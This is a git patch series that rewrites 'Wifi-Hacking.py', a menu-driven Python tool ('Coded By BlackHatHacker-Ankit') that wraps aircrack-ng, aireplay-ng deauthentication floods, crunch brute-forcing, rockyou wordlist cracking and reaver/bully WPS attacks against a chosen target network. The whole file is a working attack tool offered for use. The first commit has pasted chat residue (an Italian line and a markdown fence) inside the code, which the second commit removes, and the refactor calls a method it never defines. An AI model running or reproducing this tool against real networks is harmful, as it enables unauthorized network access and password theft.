From 54a3c5f96427ec9d162ca6ddb7e782bff1b21a7e Mon Sep 17 00:00:00 2001 From: Tuga <61603718+Tugamer89@users.noreply.github.com> Date: Sat, 8 Jul 2023 17:56:39 +0200 Subject: [PATCH 1/2] Update Wifi-Hacking.py Translated in OOP --- Wifi-Hacking.py | 596 +++++++++++++++++++----------------------------- 1 file changed, 239 insertions(+), 357 deletions(-) diff --git a/Wifi-Hacking.py b/Wifi-Hacking.py index 3030564..deee29f 100644 --- a/Wifi-Hacking.py +++ b/Wifi-Hacking.py @@ -1,378 +1,260 @@ - # coding: utf-8 #!/usr/bin/env python + import os import subprocess -from subprocess import check_call -print("\nInstalling Needed Tools") -print("\n") -cmd0 = os.system("apt-get install aircrack-ng crunch xterm wordlists reaver pixiewps bully xterm wifite") -cmd = os.system("sleep 3 && clear") -def intro(): - cmd = os.system("clear") - print("""\033[1;32m ---------------------------------------------------------------------------------------- -██╗ ██╗██╗███████╗██╗ ██████╗██████╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ -██║ ██║██║██╔════╝██║ ██╔════╝██╔══██╗██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗ -██║ █╗ ██║██║█████╗ ██║█████╗██║ ██████╔╝███████║██║ █████╔╝ █████╗ ██████╔╝ -██║███╗██║██║██╔══╝ ██║╚════╝██║ ██╔══██╗██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗ -╚███╔███╔╝██║██║ ██║ ╚██████╗██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║ - ╚══╝╚══╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ - Coded By BlackHatHacker-Ankit ---------------------------------------------------------------------------------------- -(1)Start monitor mode -(2)Stop monitor mode -(3)Scan Networks -(4)Getting Handshake(monitor mode needed) -(5)Install Wireless tools -(6)Crack Handshake with rockyou.txt (Handshake needed) -(7)Crack Handshake with wordlist (Handshake needed) -(8)Crack Handshake without wordlist (Handshake,essid needed) -(9)Create wordlist -(10)WPS Networks attacks (Bssid,monitor mode needed) -(11)Scan for WPS Networks -(0)About Me -(00)Exit ------------------------------------------------------------------------ -""") - print("\nEnter your choise here : !# ") - var = int(input("")) - if var == 1 : - print("\nEnter the interface:(Default(wlan0/wlan1))") - interface = input("") - order = "airmon-ng start {} && airmon-ng check kill".format(interface) - geny = os.system(order) - intro() - elif var == 2 : - print("\nEnter the interface:(Default(wlan0mon/wlan1mon))") - interface = input("") - order = "airmon-ng stop {} && service network-manager restart".format(interface) - geny = os.system(order) - intro() - elif var == 3 : - print("\nEnter the interface:(Default >> (wlan0mon/wlan1mon))") - interface = input("") - order = "airodump-ng {} -M".format(interface) - print("When Done Press CTRL+c") - cmd = os.system("sleep 3") - geny = os.system(order) - cmd = os.system("sleep 10") - intro() - elif var == 4 : - print("\nEnter the interface:(Default >>(wlan0mon/wlan1mon))") - interface = input("") - order = "airodump-ng {} -M".format(interface) - print("\nWhen Done Press CTRL+c") - print("\nNote: Under Probe it might be Passwords So copy them to the worlist file") - print("\nDon't Attack The Network if its Data is ZERO (you waste your time)") - print("\nyou Can use 's' to arrange networks") - cmd = os.system("sleep 7") - geny = os.system(order) - print("\nEnter the bssid of the target?") - bssid = str(input("")) - print("\nEnter the channel of the network?") - channel = int(input()) - print("Enter the path of the output file ?") - path = str(input("")) - print("\nEnter the number of the packets [1-10000] ( 0 for unlimited number)") - print("the number of the packets Depends on the Distance Between you and the network") - dist = int(input("")) - order = "airodump-ng {} --bssid {} -c {} -w {} | xterm -e aireplay-ng -0 {} -a {} {}".format(interface,bssid,channel,path,dist,bssid,interface) - geny = os.system(order) - intro() - elif var == 5 : - def wire(): - cmd = os.system("clear") - print(""" -1) Aircrack-ng 17) kalibrate-rtl -2) Asleap 18) KillerBee -3) Bluelog 19) Kismet -4) BlueMaho 20) mdk3 -5) Bluepot 21) mfcuk -6) BlueRanger 22) mfoc -7) Bluesnarfer 23) mfterm -8) Bully 24) Multimon-NG -9) coWPAtty 25) PixieWPS -10) crackle 26) Reaver -11) eapmd5pass 27) redfang -12) Fern Wifi Cracker 28) RTLSDR Scanner -13) Ghost Phisher 29) Spooftooph -14) GISKismet 30) Wifi Honey -15) Wifitap 31) gr-scan -16) Wifite 32) Back to main menu -90) airgeddon -91) wifite v2 +class WirelessTool: + def __init__(self): + self.interface = "" + self.path = "" + self.essid = "" + + def install_tools(self): + tools = [ + "aircrack-ng", "crunch", "xterm", "wordlists", "reaver", + "pixiewps", "bully", "wifite", "kalibrate-rtl", "KillerBee", + "Kismet", "mdk3", "mfcuk", "mfoc", "mfterm", "multimon-NG", + "RTLSDR Scanner", "Spooftooph", "Wifi Honey", "gr-scan" + ] + for tool in tools: + cmd = f"apt-get install {tool}" + subprocess.check_call(cmd.split()) + + def start_monitor_mode(self): + self.interface = input("Enter the interface (Default: wlan0/wlan1): ") + cmd = f"airmon-ng start {self.interface} && airmon-ng check kill" + subprocess.check_call(cmd, shell=True) + self.intro() + + def stop_monitor_mode(self): + self.interface = input("Enter the interface (Default: wlan0mon/wlan1mon): ") + cmd = f"airmon-ng stop {self.interface} && service network-manager restart" + subprocess.check_call(cmd, shell=True) + self.intro() + + def scan_networks(self): + self.interface = input("Enter the interface (Default: wlan0mon/wlan1mon): ") + cmd = f"airodump-ng {self.interface} -M" + print("When Done Press CTRL+C") + subprocess.call("sleep 3", shell=True) + subprocess.call(cmd, shell=True) + subprocess.call("sleep 10", shell=True) + self.intro() + + def get_handshake(self): + self.interface = input("Enter the interface (Default: wlan0mon/wlan1mon): ") + cmd = f"airodump-ng {self.interface} -M" + print("When Done Press CTRL+C") + print("Note: Under Probe it might be Passwords. Copy them to the wordlist file.") + print("Don't Attack The Network if its Data is ZERO (you waste your time).") + print("You can use 's' to arrange networks.") + subprocess.call("sleep 7", shell=True) + subprocess.call(cmd, shell=True) + self.bssid = input("Enter the bssid of the target: ") + self.channel = int(input("Enter the channel of the network: ")) + self.path = input("Enter the path of the output file: ") + self.dist = int(input("Enter the number of packets [1-10000] (0 for unlimited number): ")) + order = f"airodump-ng {self.interface} --bssid {self.bssid} -c {self.channel} -w {self.path} | xterm -e aireplay-ng -0 {self.dist} -a {self.bssid} {self.interface}" + subprocess.call(order, shell=True) + self.intro() + + def create_wordlist(self): + self.mini = int(input("Enter the minimum length of the password (8/64): ")) + self.max = int(input("Enter the maximum length of the password (8/64): ")) + self.path = input("Enter the path of the output file: ") + self.password = input("Enter what you want the password to contain: ") + order = f"crunch {self.mini} {self.max} {self.password} -o {self.path}" + subprocess.call(order, shell=True) + print(f"The wordlist is saved in {self.path}") + self.intro() + + def crack_handshake_rockyou(self): + if os.path.exists("/usr/share/wordlists/rockyou.txt"): + self.path = input("Enter the path of the handshake file: ") + order = f"aircrack-ng {self.path} -w /usr/share/wordlists/rockyou.txt" + print("To exit, press CTRL+C") + subprocess.call(order, shell=True) + subprocess.call("sleep 3d", shell=True) + else: + cmd = "gzip -d /usr/share/wordlists/rockyou.txt.gz" + subprocess.call(cmd, shell=True) + self.path = input("Enter the path of the handshake file: ") + order = f"aircrack-ng {self.path} -w /usr/share/wordlists/rockyou.txt" + print("To exit, press CTRL+C") + subprocess.call(order, shell=True) + subprocess.call("sleep 3d", shell=True) + exit() + + def crack_handshake_wordlist(self): + self.path = input("Enter the path of the handshake file: ") + self.wordlist = input("Enter the path of the wordlist: ") + order = f"aircrack-ng {self.path} -w {self.wordlist}" + subprocess.call(order, shell=True) + exit() + + def crack_handshake_without_wordlist(self): + self.essid = input("Enter the essid of the network: ") + self.path = input("Enter the path of the handshake file: ") + self.mini = int(input("Enter the minimum length of the password (8/64): ")) + self.max = int(input("Enter the maximum length of the password (8/64): ")) + print("1) Lowercase chars (abcdefghijklmnopqrstuvwxyz)") + print("2) Uppercase chars (ABCDEFGHIJKLMNOPQRSTUVWXYZ)") + print("3) Numeric chars (0123456789)") + print("4) Symbol chars (!#$%/=?{}[]-*:;)") + print("5) Lowercase + uppercase chars (abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ)") + print("6) Lowercase + numeric chars (abcdefghijklmnopqrstuvwxyz0123456789)") + print("7) Uppercase + numeric chars (ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789)") + print("8) Symbol + numeric chars (!#$%/=?{}[]-*:;0123456789)") + print("9) Lowercase + uppercase + numeric chars (abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789)") + print("10) Lowercase + uppercase + symbol chars (abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!#$%/=?{}[]-*:;)") + print("11) Lowercase + uppercase + numeric + symbol chars (abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!#$%/=?{}[]-*:;)") + print("12) Your Own Words and numbers") + choice = input("Enter your choice: ") + if choice == "1": + test = "abcdefghijklmnopqrstuvwxyz" + elif choice == "2": + test = "ABCDEFGHIJKLMNOPQRSTUVWXYZ" + elif choice == "3": + test = "0123456789" + elif choice == "4": + test = "!#$%/=?{}[]-*:;" + elif choice == "5": + test = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ" + elif choice == "6": + test = "abcdefghijklmnopqrstuvwxyz0123456789" + elif choice == "7": + test = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789" + elif choice == "8": + test = "!#$%/=?{}[]-*:;0123456789" + elif choice == "9": +Continuazione del codice riscritto: -0)install all wireless tools -""") - w = int(input("Enter The number of the tool : >>> ")) - if w == 1 : - cmd = os.system("sudo apt-get update && apt-get install aircrack-ng") - elif w == 90: - print("sudo apt-get update && apt-get install git && git clone https://github.com/v1s1t0r1sh3r3/airgeddon.git") - elif w == 91: - print("sudo apt-get update && apt-get install git && git clone https://github.com/derv82/wifite2.git") - elif w == 2 : - cmd = os.system("sudo apt-get update && apt-get install asleep") - elif w == 3 : - cmd = os.system("sudo apt-get update && apt-get install bluelog") - elif w == 4 : - cmd = os.system("sudo apt-get update && apt-get install bluemaho") - elif w == 5 : - cmd = os.system("sudo apt-get update && apt-get install bluepot") - elif w == 6 : - cmd = os.system("sudo apt-get update && apt-get install blueranger") - elif w == 7 : - cmd = os.system("sudo apt-get update && apt-get install bluesnarfer") - elif w == 8 : - cmd = os.system("sudo apt-get update && apt-get install bully") - elif w == 9 : - cmd = os.system("sudo apt-get update && apt-get install cowpatty") - elif w == 10 : - cmd = os.system("sudo apt-get update && apt-get install crackle") - elif w == 11 : - cmd = os.system("sudo apt-get update && apt-get install eapmd5pass") - elif w == 12 : - cmd = os.system("sudo apt-get update && apt-get install fern-wifi-cracker") - elif w == 13 : - cmd = os.system("sudo apt-get update && apt-get install ghost-phisher") - elif w == 14 : - cmd = os.system("sudo apt-get update && apt-get install giskismet") - elif w == 15 : - cmd = os.system("apt-get install git && git clone git://git.kali.org/packages/gr-scan.git") - elif w == 16 : - cmd = os.system("sudo apt-get update && apt-get install kalibrate-rtl") - elif w == 17 : - cmd = os.system("sudo apt-get update && apt-get install killerbee-ng") - elif w == 18 : - cmd = os.system("sudo apt-get update && apt-get install kismet") - elif w == 19 : - cmd = os.system("sudo apt-get update && apt-get install mdk3") - elif w == 20 : - cmd = os.system("sudo apt-get update && apt-get install mfcuk") - elif w == 21 : - cmd = os.system("sudo apt-get update && apt-get install mfoc") - elif w == 22 : - cmd = os.system("sudo apt-get update && apt-get install mfterm") - elif w == 23 : - cmd = os.system("sudo apt-get update && apt-get install multimon-ng") - elif w == 24 : - cmd = os.system("sudo apt-get update && apt-get install pixiewps") - elif w == 25 : - cmd = os.system("sudo apt-get update && apt-get install reaver") - elif w == 26 : - cmd = os.system("sudo apt-get update && apt-get install redfang") - elif w == 27 : - cmd = os.system("sudo apt-get update && apt-get install rtlsdr-scanner") - elif w == 28 : - cmd = os.system("sudo apt-get update && apt-get install spooftooph") - elif w == 29 : - cmd = os.system("sudo apt-get update && apt-get install wifi-honey") - elif w == 30 : - cmd = os.system("sudo apt-get update && apt-get install wifitap") - elif w == 31 : - cmd = os.system("sudo apt-get update && apt-get install wifite") - elif w == 32 : - intro() - elif w == 0 : - cmd = os.system("apt-get install -y aircrack-ng asleap bluelog blueranger bluesnarfer bully cowpatty crackle eapmd5pass fern-wifi-cracker ghost-phisher giskismet gqrx kalibrate-rtl killerbee kismet mdk3 mfcuk mfoc mfterm multimon-ng pixiewps reaver redfang spooftooph wifi-honey wifitap wifite") - else: - print("Not Found") - wire() - wire() - elif var == 0 : - cmd = os.system("clear") +```python + test = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789" + elif choice == "10": + test = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!#$%/=?{}[]-*:;" + elif choice == "11": + test = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!#$%/=?{}[]-*:;" + elif choice == "12": + test = input("Enter your own words and numbers: ") + else: + print("Invalid choice") + self.intro() + return + order = f"crunch {self.mini} {self.max} {test} | aircrack-ng {self.path} -e {self.essid} -w-" + subprocess.call(order, shell=True) + print("Copy the Password and Close the tool") + subprocess.call("sleep 3d", shell=True) + + def wps_network_attacks(self): + print("1) Reaver") + print("2) Bully") + print("3) Wifite (Recommended)") + print("4) PixieWps") + print("0) Back to Main Menu") + choice = int(input("Choose the kind of the attack: ")) + if choice == 1: + self.interface = input("Enter the interface to start (Default: wlan0mon/wlan1mon): ") + self.bssid = input("Enter the bssid of the network: ") + order = f"reaver -i {self.interface} -b {self.bssid} -vv" + subprocess.call(order, shell=True) + self.intro() + elif choice == 2: + self.interface = input("Enter the interface to start (Default: wlan0mon/wlan1mon): ") + self.bssid = input("Enter the bssid of the network: ") + self.channel = int(input("Enter the channel of the network: ")) + order = f"bully -b {self.bssid} -c {self.channel} --pixiewps {self.interface}" + subprocess.call(order, shell=True) + self.intro() + elif choice == 3: + subprocess.call("wifite", shell=True) + self.intro() + elif choice == 4: + self.interface = input("Enter the interface to start (Default: wlan0mon/wlan1mon): ") + self.bssid = input("Enter the bssid of the network: ") + order = f"reaver -i {self.interface} -b {self.bssid} -K" + subprocess.call(order, shell=True) + self.intro() + elif choice == 0: + self.intro() + + def about_me(self): print(""" Hi. My Name is 4nk17, A Ethical Hacker,Bug Bounty Hunter,Currently Working as Cyber Security Researcher. you can find on Instagram -https://www.instagram.com/ankit_kanojiiya/ +https://www.instagram.com/ankit_kanojiya57/ -Contack me +919768367597 +Contact me +919768367597 Feel Free to Contact, - """) quit() - elif var == 00: - exit() - elif var == 6: - if os.path.exists("/usr/share/wordlists/rockyou.txt")==True: - print("\nEnter the path of the handshake file ?") - path = str(input("")) - order = "aircrack-ng {} -w /usr/share/wordlists/rockyou.txt".format(path) - print("\nTo exit Press CTRL +C") - geny = os.system(order) - sleep = os.system("sleep 5d") - exit() - elif os.path.exists("/usr/share/wordlists/rockyou.txt")==False: - cmd = os.system("gzip -d /usr/share/wordlists/rockyou.txt.gz") - print("\nEnter the path of the handshake file ?") - path = str(input("")) - order = "aircrack-ng {} -w /usr/share/wordlists/rockyou.txt".format(path) - print("\nTo exit Press CTRL +C") - geny = os.system(order) - sleep = os.system("sleep 5d") - exit() - elif var == 7 : - print("\nEnter the path of the handshake file ?") - path = str(input("")) - print("\nEnter the path of the wordlist ?") - wordlist = str(input("")) - order = ("aircrack-ng {} -w {}").format(path,wordlist) - geny = os.system(order) - exit() - elif var == 8 : - print("\nEnter the essid of the network ?(Be careful when you type it and use 'the name of the network') ") - essid = str(input("")) - print("\nEnter the path of the handshake file ?") - path = str(input("")) - print("\nEnter the minimum length of the password (8/64)?") - mini = int(input("")) - print("\nEnter the maximum length of the password (8/64)?") - max = int(input("")) + + def intro(self): + subprocess.call("clear", shell=True) print(""" --------------------------------------------------------------------------------------- -(1) Lowercase chars (abcdefghijklmnopqrstuvwxyz) -(2) Uppercase chars (ABCDEFGHIJKLMNOPQRSTUVWXYZ) -(3) Numeric chars (0123456789) -(4) Symbol chars (!#$%/=?{}[]-*:;) -(5) Lowercase + uppercase chars (abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ) -(6) Lowercase + numeric chars (abcdefghijklmnopqrstuvwxyz0123456789) -(7) Uppercase + numeric chars (ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789) -(8) Symbol + numeric chars (!#$%/=?{}[]-*:;0123456789) -(9) Lowercase + uppercase + numeric chars (abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789) -(10) Lowercase + uppercase + symbol chars (abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!#$%/=?{}[]-*:;) -(11) Lowercase + uppercase + numeric + symbol chars (abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!#$%/=?{}[]-*:;) -(12) Your Own Words and numbers ------------------------------------------------------------------------------------------ -Crack Password Could Take Hours,Days,Weeks,Months to complete -and the speed of cracking will reduce because you generate a Huge,Huge Passwordlist -may reach to Hundreds of TeRa Bits so Be patiant +██╗ ██╗██╗███████╗██╗ ██████╗██████╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ +██║ ██║██║██╔════╝██║ ██╔════╝██╔══██╗██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗ +██║ █╗ ██║██║█████╗ ██║█████╗██║ ██████╔╝███████║██║ █████╔╝ █████╗ ██████╔╝ +██║███╗██║██║██╔══╝ ██║╚════╝██║ ██╔══██╗██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗ +╚███╔███╔╝██║██║ ██║ ╚██████╗██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║ + ╚══╝╚══╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ + Coded By BlackHatHacker-Ankit +--------------------------------------------------------------------------------------- +(1) Start monitor mode +(2) Stop monitor mode +(3) Scan Networks +(4) Getting Handshake (monitor mode needed) +(5) Install Wireless tools +(6) Crack Handshake with rockyou.txt (Handshake needed) +(7) Crack Handshake with wordlist (Handshake needed) +(8) Crack Handshake without wordlist (Handshake, essid needed) +(9) Create wordlist +(10) WPS Networks attacks (Bssid, monitor mode needed) +(11) Scan for WPS Networks + +(0) About Me +(00) Exit +----------------------------------------------------------------------- """) - print("\nEnter your choise here : ?") - set = str(input("")) - if set == "1": - test = str("abcdefghijklmnopqrstuvwxyz") - order = "crunch {} {} {} | aircrack-ng {} -e {} -w-".format(mini,max,test,path,essid) - geny = os.system(order) - elif set == "2": - test = str("ABCDEFGHIJKLMNOPQRSTUVWXYZ") - order = "crunch {} {} {} | aircrack-ng {} -e {} -w-".format(mini,max,test,path,essid) - geny = os.system(order) - elif set == "3": - test = str("0123456789") - order = "crunch {} {} {} | aircrack-ng {} -e {} -w-".format(mini,max,test,path,essid) - geny = os.system(order) - elif set == "4": - test = str("!#$%/=?{}[]-*:;") - order = "crunch {} {} {} | aircrack-ng {} -e {} -w-".format(mini,max,test,path,essid) - geny = os.system(order) - elif set == "5": - test = str("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ") - order = "crunch {} {} {} | aircrack-ng {} -e {} -w-".format(mini,max,test,path,essid) - geny = os.system(order) - elif set == "6": - test = str("abcdefghijklmnopqrstuvwxyz0123456789") - order = "crunch {} {} {} | aircrack-ng {} -e {} -w-".format(mini,max,test,path,essid) - geny = os.system(order) - elif set == "7": - test = str("ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789") - order = "crunch {} {} {} | aircrack-ng {} -e {} -w-".format(mini,max,test,path,essid) - geny = os.system(order) - elif set == "8": - test = str("!#$%/=?{}[]-*:;0123456789") - order = "crunch {} {} {} | aircrack-ng {} -e {} -w-".format(mini,max,test,path,essid) - geny = os.system(order) - elif set == "9": - test = str("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789") - order = "crunch {} {} {} | aircrack-ng {} -e {} -w-".format(mini,max,test,path,essid) - geny = os.system(order) - elif set == "10": - test = str("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!#$%/=?{}[]-*:;") - order = "crunch {} {} {} | aircrack-ng {} -e {} -w-".format(mini,max,test,path,essid) - geny = os.system(order) - elif set == "11": - test = str("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!#$%/=?{}[]-*:;") - order = "crunch {} {} {} | aircrack-ng {} -e {} -w-".format(mini,max,test,path,essid) - geny = os.system(order) - elif set == "12": - print("Enter you Own Words and numbers") - test = str(input("")) - order = "crunch {} {} {} | aircrack-ng {} -e {} -w-".format(mini,max,test,path,essid) - geny = os.system(order) + choice = input("Enter your choice here: ") + if choice == "1": + self.start_monitor_mode() + elif choice == "2": + self.stop_monitor_mode() + elif choice == "3": + self.scan_networks() + elif choice == "4": + self.get_handshake() + elif choice == "5": + self.install_tools() + self.intro() + elif choice == "6": + self.crack_handshake_rockyou() + elif choice == "7": + self.crack_handshake_wordlist() + elif choice == "8": + self.crack_handshake_without_wordlist() + elif choice == "9": + self.create_wordlist() + elif choice == "10": + self.wps_network_attacks() + elif choice == "11": + self.scan_wps_networks() + elif choice == "0": + self.about_me() + elif choice == "00": + exit() else: - print("\nNot Found") - intro() - print("Copy the Password and Close the tool") - cmd5 = os.system("sleep 3d") - elif var == 9 : - print("\nEnter the minimum length of the password (8/64)?") - mini = int(input("")) - print("\nEnter the maximum length of the password (8/64)?") - max = int(input("")) - print("\nEnter the path of the output file?") - path = str(input("")) - print("\nEnter what you want the password contain ?") - password = str(input("")) - order = ("crunch {} {} {} -o {}").format(mini,max,password,path) - geny = os.system(order) - a = ("The wordlist in >>>>> {} Named as SRART").format(path) - print(a) - elif var == 10: - cmd = os.system("clear") - print(""" -1)Reaver -2)Bully -3)wifite (Recommeneded) -4)PixieWps + print("Not Found") + subprocess.call("sleep 2", shell=True) + self.intro() -0) Back to Main Menu -""") - print("Choose the kind of the attack(External WIFI Adapter Require) ?") - attack = int(input("")) - if attack == 1: - print("\nEnter the interface to start ?(Default(Wlan0mon/Wlan1mon))") - interface = str(input("")) - print("\nEnter the bssid of the network ?") - bssid = str(input("")) - order = ("reaver -i {} -b {} -vv").format(interface,bssid) - geny = os.system(order) - intro() - elif attack == 2: - print("\nEnter the interface to start ?(Default(Wlan0mon/Wlan1mon)") - interface = str(input("")) - print("\nEnter the bssid of the network ?") - bssid = str(input("")) - print("\nEnter the channel of the network ?") - channel = int(input("")) - order = ("bully -b {} -c {} --pixiewps {}").format(bssid,channel,interface) - geny = os.system(order) - intro() - elif attack == 3: - cmd = os.system("wifite") - intro() - elif attack == 4: - print("\nEnter the interface to start ?(Default(Wlan0mon/Wlan1mon)") - interface = str(input("")) - print("\nEnter the bssid of the network ?") - bssid = str(input("")) - order = ("reaver -i {} -b {} -K").format(interface,bssid) - geny = os.system(order) - intro() - elif attack == 0 : - intro() - elif var == 11: - print("\nEnter the interface to start ?(Default(Wlan0mon/Wlan1mon)") - interface = str(input("")) - order = "airodump-ng -M --wps {}".format(interface) - geny = os.system(order) - cmd = os.system("sleep 5 ") - intro() - else: - print("Not Found") - cmd = os.system("sleep 2") - intro() -intro() + +if __name__ == "__main__": + tool = WirelessTool() + tool.intro() From 77990ca6ade63757fd509b1d5c6e72607ac6f539 Mon Sep 17 00:00:00 2001 From: Tuga <61603718+Tugamer89@users.noreply.github.com> Date: Sat, 8 Jul 2023 17:58:59 +0200 Subject: [PATCH 2/2] Update Wifi-Hacking.py --- Wifi-Hacking.py | 3 --- 1 file changed, 3 deletions(-) diff --git a/Wifi-Hacking.py b/Wifi-Hacking.py index deee29f..1b74c51 100644 --- a/Wifi-Hacking.py +++ b/Wifi-Hacking.py @@ -128,9 +128,6 @@ def crack_handshake_without_wordlist(self): elif choice == "8": test = "!#$%/=?{}[]-*:;0123456789" elif choice == "9": -Continuazione del codice riscritto: - -```python test = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789" elif choice == "10": test = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!#$%/=?{}[]-*:;"